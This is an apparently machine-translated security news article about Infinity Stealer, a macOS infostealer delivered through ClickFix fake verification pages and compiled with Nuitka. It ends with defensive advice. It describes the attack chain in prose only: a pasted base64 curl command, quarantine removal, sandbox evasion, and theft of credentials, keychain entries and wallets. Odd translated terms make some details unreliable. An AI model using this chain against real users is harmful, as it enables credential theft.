Infinity Stealer the threat of macOS that combines ClickFix and Python Nuitka to evade detection

Security researchers have documented a new campaign for macOS users that combines convincing social engineering with a packaging technique that complicates forensic analysis. The actor behind this operation distributes a thief-information named Infinity Stealer and takes advantage of a visual trap that imitates human verification screens to push the victim to run code in Terminal.

The entry door of the attack is a website that pretends to be the human validation step (something that many services, such as Cloudflare, use legitimately). Instead of forcing the navigator to solve a graphic challenge, the web requests that you copy and paste into Terminal a curl command encoded in base64. That only gesture, apparently harmless to those who trust false verification, disfigures and launches a bash sequence that downloads and writes a second component in / tmp, cancels the quarantine flag of the file and runs it in the background. The result is that the system jumps the user protections and starts a chain of malicious stages without additional interaction.

What distinguishes this campaign It's not just the visual trick, known in the research as ClickFix, but how the main payload is built: it's Python code compiled with the Nuitka open source project. Unlike utilities like PyInstaller, which pack the interpreter and bytecode Python into a recognizable container, Nuitka converts the Python code to C and generates a native binary. That produces a real Mach-O executable that is much more resistant to classic static analysis techniques and complicates reverse engineering.

The technical conclusions published by the analysts who investigated the campaign provide worrying details. The initial charger compiled with Nuitka is a multi-megabyte binary that contains a large compressed file with zstd; inside is the final stage of the infostealer. Before you start collecting information, malware performs a series of checks to identify whether it is being executed in a virtualized environment or in sandbox, allowing you to avoid automated analysis and research environments.

Once deployed, the Python component (running over Python 3.11 in the cases analyzed) includes typical capabilities of the credentials rodents: capture of pants, removal of credentials from browsers based on Chromium and Firefox, exfiltration of inputs from the macOS key, location of cryptomoneda wallets and search for secrets in development files such as .env. Everything collected is sent to the command and control server by HTTP POST requests and, in addition, operators receive a Telegram notification when the operation ends, taking advantage of the boot API on that platform.

The technical report that describes the campaign itself stresses that, as far as the observations reach, it is the first documented campaign that combines ClickFix's delivery with an infostealer written in Python and compiled with Nuitka in macOS. This combination of social engineering and native packaging is an advance in the ability of attackers to avoid traditional detections and slows the work of response teams.

Why does Nuitka complicate detection? Because it leaves less typical signals of Python malware: there is no obvious layer of bytecode that tools and analysts seek to unravel logic; instead a native binary appears that, at the level of signature and structure, is much more like a legitimate application. If this is added to the multiple-stage obfuscation (compressed files within the executable, use of environment variables to pass tokens, removal of traces when the execution ends), the task of intelligence and manual analysis becomes much more laborious.

If you want to read the original technical analysis and indicators collected by the researchers, the research is available on the Malharebytes blog: Malharebytes - Infiniti Stealer. To better understand the technical differences between Python packaging tools, you can consult the documentation of Nuitka and PyInstaller. And if you're interested in knowing how legitimate human checks work on the web, Cloudflare's documentation on verification systems (Turnstile) is a good point of reference: Cloudflare Turnstile. In addition, the way operators report results through bots can be based on the Telegram Public API: Telegram Bot API.

For users and administrators this leaves clear lessons. First, you should never paste into Terminal commands collected from web pages or messages without understanding exactly what they do; that practice is the most repeated entry door in campaigns like this. Secondly, it is recommended to strengthen implementation policies in macOS machines: apply Gatekeeper controls, keep the system and applications up to date, and consider endpoints protection solutions that inspect unusual behaviors, not just static signatures. Apple has supporting documentation that helps you understand how Gatekeeper and file quarantine help protect equipment: Apple Support - Problems to install or open apps.

If you suspect that you may have been a victim of this type of infection, it is recommended to disconnect the machine from the network, avoid reusing credentials that could have been exposed, change passwords from another safe device and contact with response services or use confidence tools to search for known artifacts. In corporate environments, blocking the execution of unsigned binaries using MDM and reviewing terminal logs and outgoing connections can help to detect early commitments.

The case of Infinity Stealer is a reminder that threats in macOS continue to evolve: attackers combine psychological tactics with obfuscation and packaging techniques to maximize impact and minimize the possibility of being analyzed. Maintaining reasonable suspicion against emerging windows, verification challenges or instructions to stick commands and strengthen security policies are simple measures that, in the long run, can make the difference between a scare and a gap.